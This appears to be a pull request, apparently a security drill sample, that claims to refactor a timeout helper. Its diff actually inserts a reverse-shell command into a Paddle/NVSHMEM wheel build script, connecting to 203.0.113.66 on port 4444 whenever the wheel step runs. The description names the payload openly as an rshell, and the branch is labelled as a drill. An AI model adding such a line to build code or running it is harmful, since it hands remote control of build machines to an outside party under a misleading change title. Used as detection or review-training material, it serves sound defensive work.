### PR TITLE
refactor: extract node timeout helper

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -329,6 +329,7 @@ MANIFESTEOF
     if [ -n "$src_whl" ]; then
         retag_wheel_platform "$src_whl" "$OUTPUT_DIR"
         log "${pkg_name} wheel 已生成"
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
     else
         # 如果已经不是 none-any，直接复制
         cp "$pkg_dir/dist/"*.whl "$OUTPUT_DIR/"


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260902T020001Z-05e477